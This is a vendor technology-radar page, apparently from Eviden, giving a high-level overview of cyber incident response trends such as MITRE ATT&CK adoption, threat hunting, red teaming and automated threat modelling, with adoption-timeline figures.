Cyber Incident Response What is Cyber incident response? Cyber Incident Response complements the advanced detection & response domain with a focus on technologies, processes and frameworks aimed at the discovering, eradicating and recovering from cyber attacks and exploited vulnerabilities within an organization. It covers the key functions and operations expected by CERT/CSIRT teams and is increasingly important to a mature cybersecurity strategy in many organizations. Why it matters Identifying technological trends will help outline and prescribe threat discovery, attack mapping, threat modelling, and threat and vulnerability management. Blue ball Green ball Yellow ball Red ball Purple ball Diagonal straight lines curves outlines X-labels-Years 0-2 years 2-5 years 5+ years Y-labels-Areas Cyber Incident Response © Eviden SAS 2024. All rights reserved. Maturity 0-2 years 2-5 years 5+ years 0-2 years 2-5 years 5+ years The landscape Adversary profiling with MITRE Att&CK: Organizations are increasingly adopting the MITRE ATT&CK framework and moving to a Threat-informed defense strategy. Such framework will help organizations understand the behavior and tactics of threat actors and proactively tailor-cut their protection strategies. Threat hunting for proactive protection With the digital transformation going full speed and the continously expanding attack surface, the old school approach of “building the defenses and waiting in the trenches” is no longer sustainable. Neither is the static approach of waiting for the published IoCs and running unitary searches. Organizations will have to adopt threat hunting, especially red teaming activities to proactively identify vulnerabilities in their environments before they are exploited by threat actors. With red teaming, organizations will get better insight on the weaknesses in their environments and will be able to proactively mitigate them. Automated Threat Modelling In order to efficiently prevent attacks and breaches, organizations will have the expand their use of risk-based approaches, especially automated threat modelling. For organizations it does not only provide them with the means for building secure systems in a repetitive and methodical approach with little to no human intervention, it also greatly decreases the chances that an attack is successful and reduces the time and human effort needed for the implementation. The remaining challenge is that Automated Threat Modelling heavily relies on very good understanding of the business infrastructure and processes. Thus introducing errors or missing information can have a negative impact on an automated approach. This could also lead to improper security response used during an attack. That is why organizations must leverage their own-SOC detection, threat intelligence sharing and cyber deception tools to identify the risks first. Key figures 46% of those technologies are either already adopted by most organizations or will be in the next two years. 46% of those technologies are expected to be adopted in the next 2 to 5 years cycle. 8% of those technologies are transformational and wide spread adoption will take over 5 years. Advanced Detection & Response Cyber Incident Response Identity & Access Management Endpoint & Mobile Security Network Security Application Security Cloud Security Data Security